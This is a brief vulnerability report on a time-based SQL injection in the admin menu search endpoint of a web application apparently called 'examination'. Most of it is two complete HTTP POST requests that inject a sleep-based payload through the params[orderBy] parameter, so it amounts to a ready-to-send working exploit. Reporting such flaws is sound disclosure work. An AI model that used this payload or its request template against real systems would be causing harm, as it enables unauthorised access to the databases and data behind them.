/admin/admin/menu/search has sql injection vulnerability

[qbz95aaa]

Vulnerability Product:examination Vulnerability type:sql injection Vulnerability Details：/admin/admin/menu/search URL /admin/admin/menu/search poc payload：(select*from(select+sleep(1)union/**/select+1)a) sleep(1)

POST /admin/admin/menu/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1431
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/menu/index
X-Csrf-Token: dJSLWCzSPApsYlV56i7X54QliEsKKtXT6hU2jfApXKpGzcoCXpBdVQIwHgrdbbisxmzeKkFCh4KcVHfbwXYJ2g==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_12=false&bRegex_13=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_12=true&bSearchable_13=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=false&bSortable_1=true&bSortable_10=false&bSortable_11=true&bSortable_12=false&bSortable_13=false&bSortable_2=true&bSortable_3=false&bSortable_4=false&bSortable_5=false&bSortable_6=false&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=14&iDisplayLength=10&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=&mDataProp_1=id&mDataProp_10=created_id&mDataProp_11=updated_at&mDataProp_12=updated_id&mDataProp_13=&mDataProp_2=pid&mDataProp_3=menu_name&mDataProp_4=icons&mDataProp_5=url&mDataProp_6=status&mDataProp_7=sort&mDataProp_8=&mDataProp_9=created_at&params%5BorderBy%5D=%28select%2Afrom%28select%2Bsleep%281%29union%2F%2A%2A%2Fselect%2B1%29a%29&params%5Bpid%5D=0&sColumns=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C&sEcho=4&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_12=&sSearch_13=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=desc

sleep 5

POST /admin/admin/menu/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1431
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/menu/index
X-Csrf-Token: dJSLWCzSPApsYlV56i7X54QliEsKKtXT6hU2jfApXKpGzcoCXpBdVQIwHgrdbbisxmzeKkFCh4KcVHfbwXYJ2g==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_12=false&bRegex_13=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_12=true&bSearchable_13=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=false&bSortable_1=true&bSortable_10=false&bSortable_11=true&bSortable_12=false&bSortable_13=false&bSortable_2=true&bSortable_3=false&bSortable_4=false&bSortable_5=false&bSortable_6=false&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=14&iDisplayLength=10&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=&mDataProp_1=id&mDataProp_10=created_id&mDataProp_11=updated_at&mDataProp_12=updated_id&mDataProp_13=&mDataProp_2=pid&mDataProp_3=menu_name&mDataProp_4=icons&mDataProp_5=url&mDataProp_6=status&mDataProp_7=sort&mDataProp_8=&mDataProp_9=created_at&params%5BorderBy%5D=%28select%2Afrom%28select%2Bsleep%285%29union%2F%2A%2A%2Fselect%2B1%29a%29&params%5Bpid%5D=0&sColumns=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C&sEcho=4&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_12=&sSearch_13=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=desc